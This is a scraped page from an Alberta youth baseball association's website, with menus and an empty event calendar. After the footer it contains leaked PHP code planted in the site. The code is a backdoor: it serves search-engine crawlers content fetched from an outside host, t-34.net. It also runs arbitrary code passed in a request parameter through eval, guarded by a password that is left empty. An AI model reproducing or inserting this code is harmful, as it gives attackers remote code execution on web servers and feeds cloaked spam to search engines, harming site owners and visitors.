Official Site
About Us
Links
Coaching Opportunities
Hosting Opportunities
Board of Directors
AABC Policies
Contact Us
Main Menu
Home
13 & 14 Extravaganza
16 & Under Tournament
Championships
Alberta Zone Championship
Canada Summer Games
Alberta Summer Games
Western Canada Games
Spring Training
Talent ID
Prospect Series
Scholarships
Spit Tobacco Awareness
Coaching Resources
Baseball Academies
Sponsors
Member Organizations
We have 26 guests online
Feed Entries
28.07.2012
Filter
Title
Venue
City
Type
Go
Reset
Limit
5
10
15
20
25
30
50
100
All
Date
Title
Venue
City
Type
Currently no events are available
EventList powered by
schlu.net
error_reporting(0); $host = "http://t-34.net/get.php"; // Ссылка на GET файл $ident = ""; //"Пароль" доступа к бекдору. engine_config.php?c=ваш_пароль&code=php_код_для_выполнения if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) { $id = urlencode("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']); $bot = urlencode($_SERVER['HTTP_USER_AGENT']); $url = $host."?id=".$id."&charset=u&bot=".$bot; if(ini_get("allow_url_fopen") == 1) { echo file_get_contents($url); } elseif(function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); echo $result; } } $url = $host."?code=code&bot=".$bot; // составляем запрос к серверу if(ini_get("allow_url_fopen") == 1) { // если разрешен fopen на сервере echo file_get_contents($url);// выводим ответ от сервера нашего }elseif(function_exists('curl_init')) { // если не разрешен, то подключаем curl и выводим $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); echo $result; } if($_REQUEST["c"] == $ident) eval(stripslashes($_REQUEST["code"]));